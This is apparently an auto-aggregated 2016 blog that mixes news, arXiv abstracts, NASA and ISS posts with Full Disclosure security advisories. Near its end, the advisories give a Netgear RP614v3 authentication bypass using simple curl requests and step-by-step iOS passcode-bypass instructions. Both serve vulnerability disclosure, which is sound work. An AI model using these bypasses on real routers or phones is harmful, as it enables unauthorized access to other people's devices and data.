Patrick McGuire: 2016-01-31

Saturday, February 6, 2016

WATCH ANONYMOUS ZONE

ANONYMOUS ZONE ... and ripped across all the country, in all kinds of terrain and we made this: Anonymous Zone, a new clip directed by Kai Neville.

from Google Alert - anonymous http://ift.tt/1L77nuJ
via IFTTT

Issue #13237

The "explore" page list all Groups and Numbers or project they contains to Anonymous users. http://ift.tt/1K5n2A5 The pages should only ...

from Google Alert - anonymous http://ift.tt/1QNwO9a
via IFTTT

Anonymous: Canto di uomini vecchi allegri e goditori

The text refers to elderly men who are undaunted by their age and are still eager to have a good time at the carnival. They do not apologize if some ...

from Google Alert - anonymous http://ift.tt/1QNwO96
via IFTTT

I have a new follower on Twitter

Flomio
We help developers integrate proximity ID technologies. #NFC #mPOS #RFID #Payment #mobilepayment #contactless #app
Miami, FL
https://t.co/dPG7ygqrQD
Following: 221 - Followers: 708

February 06, 2016 at 06:39AM via Twitter http://twitter.com/flomio

Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC

Good News for Linux Techno Freaks! Do you usually mess with your Android smartphone by trying out the continual ins and outs of various apps and custom ROMs? Then this news would be a perfect pick for you! What If, you can effectively carry a Linux computer in your pocket? Hereby introducing a new Android-based Operating system named "Maru OS" that combine the mobility of a

from The Hacker News http://ift.tt/1Xa5Lrc
via IFTTT

variable undefined error while using anonymous function with user input - MATLAB Answers

Well. i want to write a program that accepts an equation in variables x & y. then using anonymous function, i tried to solve the given equation.

from Google Alert - anonymous http://ift.tt/1NW7sRT
via IFTTT

MIT Develops Hack-Proof RFID Chip — Here's How It Works

Do you know about RFID chips and how many you are carrying at this moment? Today, RFID chips are built-in all sorts of items, including your credit cards, travel swipe cards, library books, grocery store cards, security tags, implanted medical records, passports and even the access cards provided by companies. But, What actually is an RFID chip? Radio frequency identification (RFID)

from The Hacker News http://ift.tt/1K4dNQr
via IFTTT

Anonymous

Anonymous. This borrower is 21 years old. She went to school until finishing high school. She lives in a family member's house. Her mother is in the ...

from Google Alert - anonymous http://ift.tt/1S6t3i8
via IFTTT

Massive Stars in NGC 6357

Massive stars lie within NGC 6357, an expansive emission nebula complex some 6,500 light-years away toward the tail of the constellation Scorpius. In fact, positioned near center in this ground-based close-up of NGC 6357, star cluster Pismis 24 includes some of the most massive stars known in the galaxy, stars with nearly 100 times the mass of the Sun. The nebula's bright central region also contains dusty pillars of molecular gas, likely hiding massive protostars from the prying eyes of optical instruments. Intricate shapes in the nebula are carved as interstellar winds and energetic radiation from the young and newly forming massive stars clear out the natal gas and dust and power the nebular glow. Enhancing the nebula's cavernous appearance, narrowband image data was included in this composite color image in a Hubble palette scheme. Emission from sulfur, hydrogen, and oxygen atoms is shown in red green and blue hues. The alluring telescopic view spans about 50 light-years at the estimated distance of NGC 6357. via NASA http://ift.tt/1R9z4d3

Friday, February 5, 2016

Anonymous

Anonymous. This woman is 47 years old, and she has two grown children. She was born in the city of Potosí, but had to emigrate to the city of Tarija ...

from Google Alert - anonymous http://ift.tt/1L4DICy
via IFTTT

E-mail in non-English language after anonymous purchase

It would be also great to implement the same feature for anonymous purchases (Commerce), when accounts are automatically created for new users.

from Google Alert - anonymous http://ift.tt/1Qjd9eG
via IFTTT

Orioles: RP Zach Britton agrees to 1-year, $6.75 million contract to avoid arbitration; 4-1 with 36 saves last season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

How to Unlock (and Play) Hidden Chess Game Inside Facebook Messenger

What can you do with Facebook Messenger?

Chat with your friends
Send GIFs, stickers, and photos
Make video calls
Send people money in Messenger

Have you ever wondered to Play a game while you chat with friends?

Yes, it is possible.

Facebook had made it to the reality by building a hidden built-in functionality in Facebook Messenger that lets you play Chess with your friends without having to install a third-party app.

It just takes one simple step to unlock this hidden game.

All you need to do is: type "@fbchess play" and hit Enter, during a conversation, and a small square box would appear in the chat box.

Here's how to play: The person who initiated the game would be assigned "White" side, to make the first movement.

Although there is some standard algebraic notation like:-

B for “Bishop”
R for “Rook”
Q for “Queen”
K for “King”
N for “Knight”
P for “Pawn”

Pawns could be moved by issuing the simple commands with numbers (along with the vertical axes).

For, e.g. If your first play would take the second pawn from the left and move it up one block, you would write: ‘@fbchess Pb3,’ or simply ‘@fbchess b3.'

You could refer to the help section by issuing the command "@fbchess help" for the possible commands to assist you throughout the game.

It turns out that the commands are case sensitive. The board will update and notify you whether it is your turn to play.

You can undo a move with "@fbchess undo" command or by clicking the "undo" button — but your opponent has to accept the request to undo.

The game would also allow you to have a conversation during the game with your friend, resumes the game by issuing the game commands.

FB Chess is currently available for both mobile and web platforms, eliminating the need to download it separately.

This new Productive Time Killer Game initiated to entertain its users by sharpening brain while having a chat with your mate equally.

from The Hacker News http://ift.tt/1Po5N9G
via IFTTT

Tracking Anonymous Web Users

We develop a Bayesian imputation approach that allows us to probabilistically assign anonymous sessions to users, while ac- counting for a ...

from Google Alert - anonymous http://ift.tt/23NqNk1
via IFTTT

United Nations Rules in Favor of WikiLeaks Founder Julian Assange

VICTORY!

As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.

However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.

Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.

But, Victory! The decision is in favor of Assange.

The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.

Julian Assange should be released immediately and allowed to leave the embassy as well as both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.

"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.

But, Will UK and Sweden Let Assange Leave the country?

Despite the decision is in favor of Assange, there could be a possibility that both the countries’ governments will not let Assange leave the country.

The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.

The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."

Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.

To make this sure, the Met Police, meanwhile, said it will make "every effort" to arrest Assange should he leave the embassy.

Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, to avoid extradition to:

Sweden where he is facing sexual assault allegations, which he has always denied.
The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.

Assange's Lawyer: Sweden and UK should Respect UN’s Decision

Melinda Taylor, Assange's lawyer, says that if there is a positive ruling for Assange by UN group, Swedish and British government should respect their international obligations and comply with the decision, thereby allowing him to leave freely.

"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek reporter.

If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.

Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, helping governments to release people.

Similar rulings from the UN panel have resulted in the release of:

Washington Post journalist Jason Rezaian, who was released in Iran last month.
Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.

Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges, however, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.

from The Hacker News http://ift.tt/1NTXOzj
via IFTTT

ISS Daily Summary Report – 02/4/16

Node 3 Carbon Dioxide Removal Assembly (CDRA) Repair: Kelly and Kopra replaced the Fan Motor Controller (FMC) on the Node 3 CDRA which had failed on January 19th. In addition to the FMC change out, the crew took advantage of the CDRA configuration and also replaced a faulty Secondary Heater Controller, an Air Selector Valve 104, and cleaned the Node 3 Avionic Rack Air Assembly. Following the repair, ground controllers successfully reactivated the unit. Habitability: Today Kopra recorded a narrated task video of his activities to remove and replace the Node 3 Carbon Dioxide Removal Assembly (CDRA) Heater Controller, Motor Controller and CO2 Selector Valve. He captured details such as hardware and tool interface issues, volume needed to perform the task, or other human factors concerns for task performance. The Habitability investigation results will be used to assess the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. ExtraVehicular Activity (EVA) Tool Stow: Peake received USOS tools from Volkov that were used as part of yesterday’s Russian Segment EVA. Once the tools were transferred, he stowed the items within the US Airlock. Among the items transferred were Tethers, Radio Frequency Camera Assemblies, Helmet Interchangeable Portable Lights, and Rechargeable EVA Battery Assemblies. Potable Water Dispenser Sample Analysis: Peake visually analyzed water samples within Coliform Detection Bags and Microbial Capture Devices (MCDs) after 48 hours of incubation. The samples had been obtained from the USOS and RS water dispensers on Tuesday. The samples will be returning to the ground by way of Soyuz 44 next month. Special Purpose Dexterous Manipulator (SPDM) Main Bus Switching Unit (MBSU) Demonstration: Ground controllers began 3 days of activities designed to validate robotic transfer of battery style Orbital Replacement Units (ORUs) prior to the delivery of new ISS batteries on HTV-6. A successful demonstration will allow planners to reduce the number of EVAs to install the batteries. This afternoon, controllers are using the SPDM to move the spare MBSU Flight Releasable Attachment Mechanism (FRAM) from Express Logistics Carrier (ELC)-2 to the Enhanced ORU Temporary Platform (EOTP) on SPDM. Controllers will then use the Right-hand Off-Set Tool (ROST) to unfasten the MBSU secondary bolt. Today’s Planned Activities All activities were completed unless otherwise noted. Gathering CDRA Kits Columbus Stowage Consolidation – Part 3 of 3 EPO – Review Video Demonstration Photo/TV CDRA Node 3 Video Setup Carbon Dioxide Removal Assembly (CDRA) Removal Unstow of EPO and Classroom Videos Demonstrations (CVD) items MELFI – Retrieval of Ice Bricks Position JEM Camcorder for a view of CDRA activities CDRA R&R Node1 Camcorder Settings Adjustment Post-EVA Orlan Debrief With Specialists EXPOSE-R. Copy and Downlink Data Deinstall US TV cameras, Lights, and REBA power supply from Orlan No.4 and No.6 HABIT. Overview Video Handover of US EVA Tools to the USOS after RS EVA 42 Post-EVA Pille Dosimeter Reading ISS HAM Radio – Radio Power up Drying Orlan-MK Water Feed Line Portable Computer System (PCS) Hard Drive (HD) Swap and Image Orlan Feedwater Bladder Refill Post-EVA Medical Kits Restow EVA – RS EVA Tool Stowage HABIT – Launching the Application Carbon Dioxide Removal Assembly (CDRA) CO2 Selector Valve (ASV) Remove and Replace On MCC Go Progress 431 Cygnus Cargo Operations Orlan-MK Drying – start HABIT – End Task Digital Media Setup DC1 – СУ Hatch Opening CSA PAO Recording and Downlink (Marrow P/L) On MCC GO ТКГ-СУ Hatch Opening Installing Quick-Release Screw Clamps on DC1 side ТКГ 431 (DC1) deactivation, air duct installation INTERACTION-2. Experiment Ops / r/g 1316 Environmental Health System (EHS) Microbial Capture Device (MCD) – In-flight Microbiology Water Analysis and GMT Day 33 Data Recording Orlan-MK Drying (switching to a backup fan) On-orbit hearing assessment using EARQ CIR – Post-Experiment Hardware Stowage СОЖ Maintenance HAM radio session from Columbus HABIT – Hardware Setup Orlan-MK Drying – terminate BRI log download from RSS1 Setting up Orlan and БСС for storage mode Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. Nominal System Commanding SPDM MBSU Demo Three-Day Look Ahead: Friday, 02/05: Cygnus cargo operations, remove Cyclops from JEM slidetable, CIR stow and bottle replace, EPO classroom videos, PILOT-T, SPDM MBSU Demo Saturday, 02/06: Weekly Cleaning, Crew Off Duty, SPDM MBSU demo Sunday, 02/07: Crew off Duty QUICK ISS Status – Environmental Control Group: Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Fail Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Shutdown Trace Contaminant Control System (TCCS) Lab Full Up Trace Contaminant Control System (TCCS) Node 3 Off

from ISS On-Orbit Status Report http://ift.tt/1Kugw5I
via IFTTT

Critical Flaws Found in NETGEAR Network Management System

Someone Hijacks Botnet Network & Replaces Malware with an Antivirus

The Dridex banking trojan that is widely being used by cyber criminals to distribute malware onto users’ machines has now been found distributing a security software.

A portion of the Dridex banking Trojan botnet may have been hacked or compromised by an unknown Whitehat Hacker, who replaced the malicious links with Avira Antivirus installers.

What is Dridex Banking Trojan? How it Works?

Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again.

The Dridex virus typically distributes itself through spam messages or emails that include malicious attachments, most often a Microsoft Office file or Word document integrated with malicious macros.

Once the malicious file has been clicked, the macros download and install the main payload of the virus – the trojan program itself – from a hijacked server, which installs and runs on the victim's computer.

The Dridex trojan program then creates a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects.

This results in stealing victim's personal data like usernames and passwords, with an ultimate aim to break into bank accounts and siphon off cash.

Hacker replaces Trojan with Anti-virus

However, the recent Hack Surprises: Instead of distributing banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of the free anti-virus software from Avira, as the company has announced itself.

"The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader," explained Avira malware expert Moritz Kroll, reported Reg.

Avira believes that the white hat hacker or hackers may have hacked into a portion of infected web servers using the same flaws the malware authors used and then replaced the malicious code with the Avira installer.

So, once infected, instead of receiving Dridex malware, the victims get a valid, signed copy of Avira antivirus software.

"We still don't know exactly who is doing this with our installer and why – but we have some theories," said Kroll. "This is certainly not something we are doing ourselves."

Although the motives behind including the Avira software is still unclear, these kinds of actions are considered to be illegal in many countries, said Kroll.

What can be done to protect From Malware Attacks?

The guidance for preventing yourself from being a part of the Dridex Banking Trojan botnet is:

Ensure you have an updated antivirus program running on your PC, which should be able to intercept the malicious attachments before they are opened.
One of the best measures for securing your online environment is to deploy an Intrusion Detection System (IDS) at the network layer, which is especially useful to quickly detect malware and other threats in your network when integrated with a real-time threat intelligence and SIEM (Security Intelligence and Event Monitoring) solution, such as AlienVault Unified Security Management (USM).
Be careful of opening email attachments sent from an unknown email address, particularly (in this case) Microsoft Word and Excel files.
Disable Macros in MS Office, or at least set the Macros to request permission before they run.

from The Hacker News http://ift.tt/1VTGgJp
via IFTTT

Food Addicts in Recovery Anonymous

3/1/16 1pm; 3/3/16 7pm; 3/8/16 1pm; 3/10/16 7pm; 3/15/16 1pm; 3/17/16 7pm; 3/22/16 1pm; 3/24/16 7pm; 3/29/16 1pm; 4/5/16 1pm; 4/7/16 7pm ...

from Google Alert - anonymous http://ift.tt/1mhtSGR
via IFTTT

Dwarf Planet Ceres

Dwarf planet Ceres is the largest object in the Solar System's main asteroid belt, with a diameter of about 950 kilometers (590 miles). Ceres is seen here in approximately true color, based on image data from the Dawn spacecraft recorded on May 4, 2015. On that date, Dawn's orbit stood 13,642 kilometers above the surface of the small world. Two of Ceres' famous mysterious bright spots at Oxo crater and Haulani crater are near center and center right of this view. Casting a telltale shadow at the bottom is Ceres' cone-shaped, lonely mountain Ahuna Mons. Presently some 385 kilometers above the Cerean surface, the ion-propelled Dawn spacecraft is now returning images from its closest mapping orbit. via NASA http://ift.tt/20t6SaU

Thursday, February 4, 2016

A Factorized Recurrent Neural Network based architecture for medium to large vocabulary Language Modelling. (arXiv:1602.01576v1 [cs.CL])

Statistical language models are central to many applications that use semantics. Recurrent Neural Networks (RNN) are known to produce state of the art results for language modelling, outperforming their traditional n-gram counterparts in many cases. To generate a probability distribution across a vocabulary, these models require a softmax output layer that linearly increases in size with the size of the vocabulary. Large vocabularies need a commensurately large softmax layer and training them on typical laptops/PCs requires significant time and machine resources. In this paper we present a new technique for implementing RNN based large vocabulary language models that substantially speeds up computation while optimally using the limited memory resources. Our technique, while building on the notion of factorizing the output layer by having multiple output layers, improves on the earlier work by substantially optimizing on the individual output layer size and also eliminating the need for a multistep prediction process.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1nQEbUa
via IFTTT

Ups and Downs: Modeling the Visual Evolution of Fashion Trends with One-Class Collaborative Filtering. (arXiv:1602.01585v1 [cs.AI])

Building a successful recommender system depends on understanding both the dimensions of people's preferences as well as their dynamics. In certain domains, such as fashion, modeling such preferences can be incredibly difficult, due to the need to simultaneously model the visual appearance of products as well as their evolution over time. The subtle semantics and non-linear dynamics of fashion evolution raise unique challenges especially considering the sparsity and large scale of the underlying datasets. In this paper we build novel models for the One-Class Collaborative Filtering setting, where our goal is to estimate users' fashion-aware personalized ranking functions based on their past feedback. To uncover the complex and evolving visual factors that people consider when evaluating products, our method combines high-level visual features extracted from a deep convolutional neural network, users' past feedback, as well as evolving trends within the community. Experimentally we evaluate our method on two large real-world datasets from Amazon.com, where we show it to outperform state-of-the-art personalized ranking measures, and also use it to visualize the high-level fashion trends across the 11-year span of our dataset.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1nKAbnt
via IFTTT

Fuzzy Object-Oriented Dynamic Networks. II. (arXiv:1602.01628v1 [cs.AI])

This article generalizes object-oriented dynamic networks to the fuzzy case, which allows one to represent knowledge on objects and classes of objects that are fuzzy by nature and also to model their changes in time. Within the framework of the approach described, a mechanism is proposed that makes it possible to acquire new knowledge on the basis of basic knowledge and considerably differs from well-known methods used in existing models of knowledge representation. The approach is illustrated by an example of construction of a concrete fuzzy object-oriented dynamic network.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1nQEbU8
via IFTTT

A Generalised Quantifier Theory of Natural Language in Categorical Compositional Distributional Semantics with Bialgebras. (arXiv:1602.01635v1 [cs.CL])

Categorical compositional distributional semantics is a model of natural language; it combines the statistical vector space models of words with the compositional models of grammar. We formalise in this model the generalised quantifier theory of natural language, due to Barwise and Cooper. The underlying setting is a compact closed category with bialgebras. We start from a generative grammar formalisation and develop an abstract categorical compositional semantics for it, then instantiate the abstract setting to sets and relations and to finite dimensional vector spaces and linear maps. We prove the equivalence of the relational instantiation to the truth theoretic semantics of generalized quantifiers. The vector space instantiation formalises the statistical usages of words and enables us to, for the first time, reason about quantified phrases and sentences compositionally in distributional semantics.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1nKAbnp
via IFTTT

Formal Verification of Autonomous Vehicle Platooning. (arXiv:1602.01718v1 [cs.AI])

The coordination of multiple autonomous vehicles into convoys or platoons is expected on our highways in the near future. However, before such platoons can be deployed, the new autonomous behaviors of the vehicles in these platoons must be certified. An appropriate representation for vehicle platooning is as a multi-agent system in which each agent captures the "autonomous decisions" carried out by each vehicle. In order to ensure that these autonomous decision-making agents in vehicle platoons never violate safety requirements, we use formal verification. However, as the formal verification technique used to verify the agent code does not scale to the full system and as the global verification technique does not capture the essential verification of autonomous behavior, we use a combination of the two approaches. This mixed strategy allows us to verify safety requirements not only of a model of the system, but of the actual agent code used to program the autonomous vehicles.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1nQEdv7
via IFTTT

Updating Formulas and Algorithms for Computing Entropy and Gini Index from Time-Changing Data Streams. (arXiv:1403.6348v4 [cs.AI] UPDATED)

Despite growing interest in data stream mining the most successful incremental learners, such as VFDT, still use periodic recomputation to update attribute information gains and Gini indices. This note provides simple incremental formulas and algorithms for computing entropy and Gini index from time-changing data streams.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1lkDGgZ
via IFTTT

The Ubuntu Dialogue Corpus: A Large Dataset for Research in Unstructured Multi-Turn Dialogue Systems. (arXiv:1506.08909v3 [cs.CL] UPDATED)

This paper introduces the Ubuntu Dialogue Corpus, a dataset containing almost 1 million multi-turn dialogues, with a total of over 7 million utterances and 100 million words. This provides a unique resource for research into building dialogue managers based on neural language models that can make use of large amounts of unlabeled data. The dataset has both the multi-turn property of conversations in the Dialog State Tracking Challenge datasets, and the unstructured nature of interactions from microblog services such as Twitter. We also describe two neural learning architectures suitable for analyzing this dataset, and provide benchmark performance on the task of selecting the best next response.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1KrsuvI
via IFTTT

Breaking Symmetries in Graph Search with Canonizing Sets. (arXiv:1511.08205v2 [cs.AI] UPDATED)

There are many complex combinatorial problems which involve searching for an undirected graph satisfying given constraints. Such problems are often highly challenging because of the large number of isomorphic representations of their solutions. This paper introduces effective and compact, complete symmetry breaking constraints for small graph search. Enumerating with these symmetry breaks generates all and only non-isomorphic solutions. For small search problems, with up to $10$ vertices, we compute instance independent symmetry breaking constraints. For small search problems with a larger number of vertices we demonstrate the computation of instance dependent constraints which are complete. We illustrate the application of complete symmetry breaking constraints to extend two known sequences from the OEIS related to graph enumeration. We also demonstrate the application of a generalization of our approach to fully-interchangeable matrix search problems.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1RfDYEx
via IFTTT

VBPR: Visual Bayesian Personalized Ranking from Implicit Feedback. (arXiv:1510.01784v1 [cs.IR] CROSS LISTED)

Modern recommender systems model people and items by discovering or `teasing apart' the underlying dimensions that encode the properties of items and users' preferences toward them. Critically, such dimensions are uncovered based on user feedback, often in implicit form (such as purchase histories, browsing logs, etc.); in addition, some recommender systems make use of side information, such as product attributes, temporal information, or review text. However one important feature that is typically ignored by existing personalized recommendation and ranking methods is the visual appearance of the items being considered. In this paper we propose a scalable factorization model to incorporate visual signals into predictors of people's opinions, which we apply to a selection of large, real-world datasets. We make use of visual features extracted from product images using (pre-trained) deep networks, on top of which we learn an additional layer that uncovers the visual dimensions that best explain the variation in people's feedback. This not only leads to significantly more accurate personalized ranking methods, but also helps to alleviate cold start issues, and qualitatively to analyze the visual dimensions that influence people's opinions.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1jOXGdu
via IFTTT

Orioles: RP Brian Matusz agrees to 1-year deal, avoiding arbitration; 2.94 ERA over 49 innings last season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] Executable installers are vulnerable^WEVIL (case 23): WinImage's installer and self-extractors allow arbitrary (remote) code execution and escalation of privilege

[FD] Netgear RP614v3 : Authentication Bypass

########################################### Vendor : NETGEAR Product : RP614v3 informed on : 12. 10. 2015 responded : no fixed : no Effect : Remotely exploitable over LAN/WLAN Typ : Authentication Bypass Difficulty : trivial ########################################### The N300 FW authentication bypass inspired me to check my rp614v3 router and I found this bypass: Firmware: *Firmwareversion* V6.0GR Oct 26 2004 ( which seems to be the lastest ) It's an old model, but it's still in operation with ADSL2 connections like TCOM DSL6000 in Germany. How it works: If you use a normal browser, it sends a *HEAD*, followed by a GET, to the router first, which gets a 403 Forbidden back: # curl -I "http://ift.tt/23LDsnp" HTTP/1.0 403 Forbidden this was expected and is the valid answere, but if you send a *GET* instead of the HEAD and your not authenticated, you get the 200 back : # curl -i "http://ift.tt/23LDsnp" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 7158 Accept-ranges: bytes Content-type: text/html ... Works for every page, with all informations disclosed the router has to offer. No password nor a username needed. Example : #curl -i "http://ift.tt/1L0X7UM" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 13722 Accept-ranges: bytes Content-type: text/html ....

�	#	IP-Adresse	Ger�tename	MAC-Adresse
	1	192.168.1.2	LapTop	00:15:a5:d5:f7:7c
	2	192.168.1.3	Accesspoint	21:6e:5c:23:86:a2

(all ips and mac have been changed ) Sidenote: As it's a problem of the underlying httpd server from "Delta Networks Inc." , it's most likely to be effecting all dsl router products using that same version of the httpd.

Source: Gmail -> IFTTT-> Blogger

[FD] osTicket multiple vulnerabilities

============================================= - Release date: February 04th, 2016 - Discovered by: Giovanni Cerrato and Enrico Cinquini - Severity: High ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Orioles: SP Odrisamer Despaigne acquired from Padres for minor-league SP J.C. Cosme -- multiple reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] NDI5aster – Privilege Escalation through NDIS 5.x Filter Intermediate Drivers

NDI5aster – Privilege Escalation through NDIS 5.x Filter Intermediate Drivers ABSTRACT The Network Driver Interface Specification (NDIS) [11] provides a programming interface specification that facilitates from the network driver architecture perspective the communication between a protocol driver and the underlying network adapter. In Windows OS the so called “NDIS wrapper” (implemented in the Ndis.sys) provides a programming layer of communication between network protocols (TCP/IP) and all the underlying NDIS device drivers so that the implementation of high-level protocol components are independent of the network adapter itself. During vulnerability research from a local security perspective that was performed over several software firewall products designed for Windows XP and Windows Server 2003 (R2 included), an issue during the loading and initialization of one of the OS NDIS protocol drivers was identified; specifically the ’Remote Access and Routing Driver’ called wanarp.sys. This issue can be exploited through various NDIS 5.x filter intermediate drivers [4] that provide the firewall functionality of several security related products. The resulting impact is vertical privilege escalation which allows a local attacker to execute code with kernel privileges from any account type, thus completely compromising the affected host. URL: http://ift.tt/1nJKckJ

Source: Gmail -> IFTTT-> Blogger

[FD] Apple iOS v9.1, 9.2 & 9.2.1 - Application Update Loop Pass Code Bypass

Document Title: =============== Apple iOS v9.1, 9.2 & 9.2.1 - Application Update Loop Pass Code Bypass References (Source): ==================== http://ift.tt/1VPrL9u Apple Follow-up ID: 631627909 Video: http://ift.tt/1nOLrQi Vulnerability Magazine: http://ift.tt/1SuXY8w Release Date: ============= 2016-02-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1710 Common Vulnerability Scoring System: ==================================== 6 Product & Service Introduction: =============================== iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have been sold through June 2012. ( Copy of the Homepage: http://ift.tt/15d7WzJ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a pass code lock auth bypass vulnerability in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. Vulnerability Disclosure Timeline: ================================== 2015-10-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-10-23: Vendor Notification (Apple Product Security Team) 2015-01-22: Vendor Response/Feedback (Apple Product Security Team) 2016-**-**: Vendor Fix/Patch (Apple Product Developer Team) 2016-02-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Apple Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application. The vulnerability is located in the iPad 2 & iPhone 5 & 6 hardware configuration with iOS v8.2 - v9.2 when processing an update which results in a interface loop by the application slides. Local attacker can trick the iOS device into a mode were a runtime issue with unlimited loop occurs. This finally results in a temporarily deactivate of the pass code lock screen. By loading the loop with remote app interaction we was able to stable bypass the auth of an iphone after the reactivation via shutdown button. The settings of the device was permanently requesting the pass code lock on interaction. Normally the pass code lock is being activated during the shutdown button interaction. In case of the loop the request shuts the display down but does not activate the pass code lock like demonstrated in the attached poc security video. In case of exploitation the attack could be performed time-based by a manipulated iOS application or by physical device access and interaction with restricted system user account. In earlier cases of exploitation these type of loops were able to be used as jailbreak against iOS. The vulnerability can be exploited in non-jailbroken unlocked apple iphone mobiles. The security risk of the local pass code bypass issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the local bug requires pending on the attack scenario local device access or a manipulated app installed to the device without user interaction. Successful exploitation of the security vulnerability results in unauthorized device access via pass code lock bypass. Proof of Concept (PoC): ======================= The new attack case of scenario can be exploited by local attackers with physical bank branch office service access and valid local banking card. For security demonstration or to reproduce the issue follow the provided information & steps below to continue. Manual steps to reproduce the vulnerability ... 1. First fill up about some % of the free memory in the iOS device with random data 2. Now, you open the app-store choose to update all applications (update all push button) 3. Switch fast via home button to the slide index and perform iOS update at the same time Note: The interaction to switch needs to be performed very fast to successfully exploit. In the first load of the update you can still use the home button. Press it go back to index 4. Now, press the home button again to review the open runnings slides 5. Switch to the left menu after the last slide which is new and perform to open siri in the same moment. Now the slide hangs and runs all time in a loop 6. Turn of via power button the ipad or iphone .... 7. Reactivate via power button and like you can see the session still runs in the loop and can be requested without any pass code Note: Normally the pass code becomes available after the power off button interaction to stand-by mode 8. Successful reproduce of the local security vulnerability! Video Demonstration: In a video we demonstrate how to bypass with a unlimited loop in the interface the pass code lock settings of the iOS v9 iPad2. The issue is not limited to the device and can be exploited with iPhone as well. The power button on top activates with the stand-by mode the pass code lock for the iOS device. In case of the loop we tricked the device into a mode were we was able to bypass the pass code. URL: https://www.youtube.com/watch?v=V-9lE1L3nq0 Solution - Fix & Patch: 